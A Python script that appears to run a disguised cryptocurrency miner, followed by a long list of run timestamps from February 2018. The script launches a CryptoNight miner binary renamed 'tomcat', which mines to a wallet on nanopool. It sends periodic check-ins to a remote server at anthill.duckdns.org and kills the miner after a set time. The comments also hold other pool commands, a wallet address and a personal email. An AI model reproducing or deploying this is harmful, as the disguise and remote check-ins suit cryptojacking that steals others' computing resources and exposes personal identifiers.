import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:13:06.172365
#2018-02-17 16:01:03.475413
#2018-02-17 17:49:03.427586
#2018-02-17 19:36:05.944104
#2018-02-17 21:24:03.904057
#2018-02-17 23:08:06.206983
#2018-02-18 00:55:05.969967
#2018-02-18 02:43:05.864519
#2018-02-18 04:31:07.184794
#2018-02-18 06:23:01.236777
#2018-02-18 08:12:01.814634
#2018-02-18 09:58:07.133512
#2018-02-18 11:45:09.696672
#2018-02-18 13:31:05.615911
#2018-02-18 15:20:08.295350
#2018-02-18 17:09:06.357075
#2018-02-18 18:57:06.913635
#2018-02-18 20:44:04.724049
#2018-02-18 22:29:03.640315
#2018-02-19 00:18:05.384683
#2018-02-19 02:04:05.636910
#2018-02-19 03:50:01.631128
#2018-02-19 05:34:06.824336
#2018-02-19 07:22:06.459979
#2018-02-19 09:11:06.363151
#2018-02-19 10:59:06.069195
#2018-02-19 12:46:06.178803
#2018-02-19 14:33:06.473397
#2018-02-19 16:20:10.348352
#2018-02-19 18:06:04.830519
#2018-02-19 19:52:08.624843
#2018-02-19 21:39:07.780121
#2018-02-19 23:27:05.220329
#2018-02-20 01:12:07.454121
#2018-02-20 03:02:06.913456
#2018-02-20 04:48:06.315397
#2018-02-20 06:32:01.801036
#2018-02-20 08:16:05.748765
#2018-02-20 10:01:08.056089
#2018-02-20 11:46:09.545053
#2018-02-20 13:34:01.305957
#2018-02-20 15:16:08.966939
#2018-02-20 17:03:09.457458
#2018-02-20 18:52:07.764020
#2018-02-20 20:44:04.547025
#2018-02-20 22:28:07.321775
#2018-02-21 00:11:06.464223
#2018-02-21 01:56:07.839576
#2018-02-21 03:46:06.817091
#2018-02-21 05:35:04.421699
#2018-02-21 07:25:07.202456
#2018-02-21 09:10:07.054838
#2018-02-21 10:58:06.565395
#2018-02-21 12:46:01.256936
#2018-02-21 14:34:01.849155
#2018-02-21 16:20:01.697248
#2018-02-21 18:11:07.092819
#2018-02-21 19:56:08.120757
#2018-02-21 21:43:04.788748
#2018-02-21 23:31:07.830364
#2018-02-22 01:19:03.696190
#2018-02-22 03:09:03.770918
#2018-02-22 04:53:06.670974
#2018-02-22 06:38:07.010770
#2018-02-22 08:27:02.174930
#2018-02-22 10:14:05.469913
#2018-02-22 11:58:05.495042
#2018-02-22 13:43:08.449756
#2018-02-22 15:31:06.801571
#2018-02-22 17:17:08.856660
#2018-02-22 19:05:09.118811
#2018-02-22 20:58:06.893698
#2018-02-22 22:43:07.722799
#2018-02-23 00:32:06.974532
#2018-02-23 02:18:07.977948
#2018-02-23 04:06:03.949738
#2018-02-23 05:53:04.438105
#2018-02-23 07:42:08.494966
#2018-02-23 09:44:08.410872
#2018-02-23 11:51:08.080012
#2018-02-23 13:41:01.515576
#2018-02-23 15:29:02.027526
#2018-02-23 17:18:07.546084
#2018-02-23 19:02:04.318323
#2018-02-23 20:47:06.292507
#2018-02-23 22:36:01.322565
#2018-02-24 00:22:05.226093
#2018-02-24 02:14:04.108824
#2018-02-24 04:04:07.103254
#2018-02-24 05:52:04.242249
#2018-02-24 07:40:09.198709
#2018-02-24 09:25:06.020616
#2018-02-24 11:19:07.483142
#2018-02-24 13:08:01.914985
#2018-02-24 14:58:03.997976
#2018-02-24 16:47:04.830713
#2018-02-24 18:35:06.652476
#2018-02-24 20:24:03.416966
#2018-02-24 22:19:06.267217
#2018-02-25 01:27:07.225162
#2018-02-25 04:01:03.813133
#2018-02-25 07:56:05.186176